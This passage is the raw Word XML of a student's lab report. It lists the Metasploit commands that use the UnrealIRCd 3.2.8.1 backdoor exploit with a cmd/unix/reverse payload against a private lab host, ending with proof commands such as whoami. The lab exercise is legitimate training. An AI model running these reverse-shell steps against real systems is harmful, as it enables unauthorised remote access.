          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B3B9A" w14:textId="180E3D27" w:rsidR="00411290" w:rsidRPr="00DF671C" w:rsidRDefault="0019226E" w:rsidP="006F5FA0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754CC354" wp14:editId="759F31F3">
            <wp:extent cx="4677711" cy="67372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5413" cy="7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5F9E" w14:textId="1C16219C" w:rsidR="006F5FA0" w:rsidRPr="006F5FA0" w:rsidRDefault="006F5FA0" w:rsidP="00C83FB8">
      <w:r w:rsidRPr="006F5FA0">
        <w:t xml:space="preserve">b) Include a screenshot on your success. This screenshot should include the results of executing the following commands: 'whoami' and 'ip a show dev eth0'. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F672155" w14:textId="657E8F6C" w:rsidR="00FD0F8E" w:rsidRPr="00C83FB8" w:rsidRDefault="006F5FA0" w:rsidP="00C83FB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43511FBD" wp14:editId="51CE32DA">
            <wp:extent cx="5731510" cy="36214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F07D" w14:textId="75F6920A" w:rsidR="004D4FEF" w:rsidRPr="004D4FEF" w:rsidRDefault="004D4FEF" w:rsidP="004D4FEF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C5972E" w14:textId="258E3821" w:rsidR="00490976" w:rsidRPr="00490976" w:rsidRDefault="004D4FEF" w:rsidP="00490976">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4FEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Repeat the above attack, but set the 'cmd/unix/reverse' as payload this time. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2566E" w14:textId="77777777" w:rsidR="00CE2727" w:rsidRDefault="00490976" w:rsidP="00852F8F">
      <w:r w:rsidRPr="00490976">
        <w:t xml:space="preserve">a) Include every step with the command lines involved into your lab report. </w:t>
      </w:r>
      <w:r w:rsidR="00CE2727">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CE2727">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CE2727" w:rsidRPr="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidR="00CE2727" w:rsidRPr="00CE2727">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE2727" w:rsidRPr="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo service postgresql start</w:t>
      </w:r>
      <w:r w:rsidR="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CE2727">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11640B76" wp14:editId="3A52E923">
            <wp:extent cx="2457780" cy="32770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7708" cy="3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27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CE2727">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00CE2727" w:rsidRPr="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEFFD0" w14:textId="4BC81DBD" w:rsidR="00CE2727" w:rsidRDefault="00CE2727" w:rsidP="00852F8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5729C72E" wp14:editId="126B7F3D">
            <wp:extent cx="3101809" cy="168080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7584" cy="16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1938" w14:textId="77777777" w:rsidR="00CE2727" w:rsidRDefault="004D4FEF" w:rsidP="00852F8F">
      <w:r w:rsidRPr="004D4FEF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 2: search unreal_irc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF8859" w14:textId="77777777" w:rsidR="00CE2727" w:rsidRDefault="00CE2727" w:rsidP="00852F8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74B3D6F7" wp14:editId="3E61C7A6">
            <wp:extent cx="4022303" cy="684050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5927" cy="70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D4FEF" w:rsidRPr="004D4FEF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="00CE2727">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 3: use exploit/unix/irc/unreal_ircd_3281_backdoor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A34B4F6" wp14:editId="6E86E29A">
            <wp:extent cx="2954622" cy="26678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6057" cy="36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D1AD" w14:textId="77777777" w:rsidR="00B0220B" w:rsidRDefault="00CE2727" w:rsidP="00852F8F">
      <w:r w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 4: show payloads</w:t>
      </w:r>
      <w:r w:rsidR="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B0220B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42C99480" wp14:editId="773D95EF">
            <wp:extent cx="3791931" cy="107296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8283" cy="109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20B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="004D4FEF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00B0220B" w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: set payload cmd/unix/reverse</w:t>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B0220B">
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B0220B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A98479F" wp14:editId="0E24CAA7">
            <wp:extent cx="4217868" cy="23084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9518" cy="26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77D0C6A" w14:textId="6FE95C1C" w:rsidR="00B0220B" w:rsidRDefault="00B0220B" w:rsidP="00852F8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 6: show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA2FE5" w14:textId="70E1189F" w:rsidR="00B0220B" w:rsidRDefault="00B0220B" w:rsidP="00852F8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="067A8D3E" wp14:editId="6CA978A1">
            <wp:extent cx="4066382" cy="1479954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819" cy="149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7229" w14:textId="77777777" w:rsidR="00B0220B" w:rsidRPr="00B0220B" w:rsidRDefault="004D4FEF" w:rsidP="00852F8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4FEF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 5: set rhosts 192.168.1.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A185467" w14:textId="615EE036" w:rsidR="00B0220B" w:rsidRDefault="00B0220B" w:rsidP="00852F8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="096FAB14" wp14:editId="31DFC39B">
            <wp:extent cx="4926132" cy="2548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6089" cy="27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FEF" w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 6: set lhost 192.168.1.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34CA2B" w14:textId="01F2F99E" w:rsidR="00852F8F" w:rsidRPr="0025766C" w:rsidRDefault="00B0220B" w:rsidP="00852F8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AC15115" wp14:editId="400C92E6">
            <wp:extent cx="4809850" cy="260582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4718" cy="31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FEF" w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004D4FEF" w:rsidRPr="00B0220B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 7: exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE6026" w14:textId="5A71083D" w:rsidR="00B0220B" w:rsidRPr="00B0220B" w:rsidRDefault="00B0220B" w:rsidP="00852F8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D55FC8E" wp14:editId="4E1C4EC4">
            <wp:extent cx="5731510" cy="18522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8C58" w14:textId="41E560BA" w:rsidR="00852F8F" w:rsidRDefault="00852F8F" w:rsidP="00852F8F">
      <w:r w:rsidRPr="00852F8F">
        <w:t xml:space="preserve">b) Include a screenshot on your success. This screenshot should include the results of executing the following commands: 'whoami' and 'ip a show dev eth0'. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC9E5B" w14:textId="521AA874" w:rsidR="001B1F55" w:rsidRPr="00852F8F" w:rsidRDefault="00ED521D" w:rsidP="00852F8F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63BD53F0" wp14:editId="3CEBBCF4">
            <wp:extent cx="5731510" cy="3603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FEF" w14:textId="77777777" w:rsidR="00572DC6" w:rsidRPr="00572DC6" w:rsidRDefault="00572DC6" w:rsidP="00572DC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D24D43" w14:textId="0E49ECD9" w:rsidR="003A3F37" w:rsidRPr="003A3F37" w:rsidRDefault="00572DC6" w:rsidP="003A3F37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003A3F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EADAA1" w14:textId="77777777" w:rsidR="003A3F37" w:rsidRPr="003A3F37" w:rsidRDefault="003A3F37" w:rsidP="003A3F37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B57A772" w14:textId="13D243C8" w:rsidR="000F1011" w:rsidRDefault="000F1011" w:rsidP="000F1011">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3976F411" w14:textId="77777777" w:rsidR="008876D9" w:rsidRDefault="008876D9" w:rsidP="000F1011">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6C5112" w14:textId="77777777" w:rsidR="008876D9" w:rsidRPr="000F1011" w:rsidRDefault="008876D9" w:rsidP="000F1011">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599EF8B0" w14:textId="3CBF6521" w:rsidR="001523C8" w:rsidRPr="001523C8" w:rsidRDefault="001523C8" w:rsidP="001523C8"/>
    <w:p w14:paraId="58C51684" w14:textId="77777777" w:rsidR="001523C8" w:rsidRPr="00C33908" w:rsidRDefault="001523C8" w:rsidP="00C33908"/>
    <w:p w14:paraId="13DEE582" w14:textId="3E070B61" w:rsidR="00C97F01" w:rsidRDefault="00C97F01" w:rsidP="008F7651"/>
    <w:p w14:paraId="3EB3E773" w14:textId="77777777" w:rsidR="003D1312" w:rsidRPr="008F7651" w:rsidRDefault="003D1312" w:rsidP="008F7651"/>
    <w:p w14:paraId="768DC1D4" w14:textId="77777777" w:rsidR="00B66F85" w:rsidRPr="0047058E" w:rsidRDefault="00B66F85" w:rsidP="0047058E"/>
    <w:p w14:paraId="0C154E97" w14:textId="77777777" w:rsidR="0047058E" w:rsidRPr="004C7A68" w:rsidRDefault="0047058E" w:rsidP="004C7A68">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31610851" w14:textId="77777777" w:rsidR="00B940AD" w:rsidRPr="00B940AD" w:rsidRDefault="00B940AD" w:rsidP="001E75E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0907EC6C" w14:textId="77777777" w:rsidR="00D814B5" w:rsidRPr="001E75E9" w:rsidRDefault="00D814B5" w:rsidP="001E75E9"/>
    <w:p w14:paraId="12EA2198" w14:textId="3B1785EE" w:rsidR="004565A7" w:rsidRDefault="004565A7" w:rsidP="006D1C2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1079E0C4" w14:textId="77777777" w:rsidR="004565A7" w:rsidRPr="006D1C2D" w:rsidRDefault="004565A7" w:rsidP="006D1C2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4E43BD" w14:textId="77777777" w:rsidR="0078495C" w:rsidRDefault="0078495C" w:rsidP="005364C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEBCCA7" w14:textId="77777777" w:rsidR="008249EF" w:rsidRPr="005364C2" w:rsidRDefault="008249EF" w:rsidP="005364C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD1A332" w14:textId="77777777" w:rsidR="008E26C0" w:rsidRPr="008E26C0" w:rsidRDefault="008E26C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008E26C0" w:rsidRPr="008E26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8E7"/>
    <w:rsid w:val="00021299"/>
    <w:rsid w:val="00032E77"/>
    <w:rsid w:val="000459A1"/>
    <w:rsid w:val="00050A48"/>
    <w:rsid w:val="000770DA"/>
    <w:rsid w:val="000B3845"/>
    <w:rsid w:val="000F1011"/>
    <w:rsid w:val="000F4C1B"/>
    <w:rsid w:val="000F753B"/>
    <w:rsid w:val="00113E48"/>
    <w:rsid w:val="00124498"/>
    <w:rsid w:val="001458E7"/>
    <w:rsid w:val="001523C8"/>
    <w:rsid w:val="001659BA"/>
    <w:rsid w:val="0019226E"/>
    <w:rsid w:val="001B1F55"/>
    <w:rsid w:val="001D0418"/>
    <w:rsid w:val="001E75E9"/>
    <w:rsid w:val="00202780"/>
    <w:rsid w:val="002457AB"/>
    <w:rsid w:val="0025766C"/>
    <w:rsid w:val="002A0439"/>
    <w:rsid w:val="002C3394"/>
    <w:rsid w:val="0032169D"/>
    <w:rsid w:val="00351B70"/>
    <w:rsid w:val="003526A1"/>
    <w:rsid w:val="00354C06"/>
    <w:rsid w:val="0036527C"/>
    <w:rsid w:val="0039423F"/>
    <w:rsid w:val="003A3F37"/>
    <w:rsid w:val="003D1312"/>
    <w:rsid w:val="003D6AFE"/>
    <w:rsid w:val="003E7576"/>
    <w:rsid w:val="003F4877"/>
    <w:rsid w:val="00411290"/>
    <w:rsid w:val="00446779"/>
    <w:rsid w:val="004565A7"/>
    <w:rsid w:val="0047058E"/>
    <w:rsid w:val="00490976"/>
    <w:rsid w:val="004B6F39"/>
    <w:rsid w:val="004C0161"/>
    <w:rsid w:val="004C7A68"/>
    <w:rsid w:val="004D4FEF"/>
    <w:rsid w:val="004E42A9"/>
    <w:rsid w:val="0050531C"/>
    <w:rsid w:val="00530A00"/>
    <w:rsid w:val="005364C2"/>
    <w:rsid w:val="005432D1"/>
    <w:rsid w:val="00557028"/>
    <w:rsid w:val="0056010C"/>
    <w:rsid w:val="00572DC6"/>
    <w:rsid w:val="00576EA1"/>
    <w:rsid w:val="00577AED"/>
    <w:rsid w:val="005D4690"/>
    <w:rsid w:val="00617CB1"/>
    <w:rsid w:val="00676A16"/>
    <w:rsid w:val="006A0A3A"/>
    <w:rsid w:val="006A6FC4"/>
    <w:rsid w:val="006D1C2D"/>
    <w:rsid w:val="006F249F"/>
    <w:rsid w:val="006F5FA0"/>
    <w:rsid w:val="006F6690"/>
    <w:rsid w:val="007023A7"/>
    <w:rsid w:val="00706918"/>
    <w:rsid w:val="0075632E"/>
    <w:rsid w:val="0078495C"/>
    <w:rsid w:val="007D4903"/>
    <w:rsid w:val="008249EF"/>
    <w:rsid w:val="00833653"/>
    <w:rsid w:val="00852F8F"/>
    <w:rsid w:val="00871EA4"/>
    <w:rsid w:val="008734C5"/>
    <w:rsid w:val="008876D9"/>
    <w:rsid w:val="008E26C0"/>
    <w:rsid w:val="008E56DB"/>
    <w:rsid w:val="008F7651"/>
    <w:rsid w:val="009044B4"/>
    <w:rsid w:val="00A313F5"/>
    <w:rsid w:val="00AE748F"/>
    <w:rsid w:val="00B0220B"/>
    <w:rsid w:val="00B269AD"/>
    <w:rsid w:val="00B46A74"/>
    <w:rsid w:val="00B66F85"/>
    <w:rsid w:val="00B70202"/>
    <w:rsid w:val="00B776E0"/>
    <w:rsid w:val="00B9329E"/>
    <w:rsid w:val="00B940AD"/>
    <w:rsid w:val="00BB049D"/>
    <w:rsid w:val="00BB3A75"/>
    <w:rsid w:val="00BD359C"/>
    <w:rsid w:val="00BD4F6D"/>
    <w:rsid w:val="00BE1B6D"/>
    <w:rsid w:val="00BE2970"/>
    <w:rsid w:val="00C33908"/>
    <w:rsid w:val="00C43A9A"/>
    <w:rsid w:val="00C6076C"/>
    <w:rsid w:val="00C83FB8"/>
    <w:rsid w:val="00C90FD5"/>
    <w:rsid w:val="00C93D90"/>
    <w:rsid w:val="00C97F01"/>
    <w:rsid w:val="00CE2727"/>
    <w:rsid w:val="00D2086A"/>
    <w:rsid w:val="00D20AE7"/>
    <w:rsid w:val="00D304B7"/>
    <w:rsid w:val="00D814B5"/>
    <w:rsid w:val="00D8215D"/>
    <w:rsid w:val="00DF671C"/>
    <w:rsid w:val="00E35E25"/>
    <w:rsid w:val="00E775BA"/>
    <w:rsid w:val="00E9220C"/>
    <w:rsid w:val="00E95C7A"/>
    <w:rsid w:val="00ED521D"/>
    <w:rsid w:val="00FC2E01"/>
    <w:rsid w:val="00FD0C68"/>
    <w:rsid w:val="00FD0F8E"/>
    <w:rsid w:val="00FD4237"/>
    <w:rsid w:val="00FF1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0BFE5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C0116BD3-716B-43A3-A066-1F0CF05CE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nsolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas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1011"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr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1011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050A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54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1150</TotalTime>
  <Pages>11</Pages>
  <Words>805</Words>
  <Characters>4589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Heja Bibani</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Heja Bibani</cp:lastModifiedBy>
  <cp:revision>119</cp:revision>
  <cp:lastPrinted>2021-04-02T00:38:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-27T03:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-15T23:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>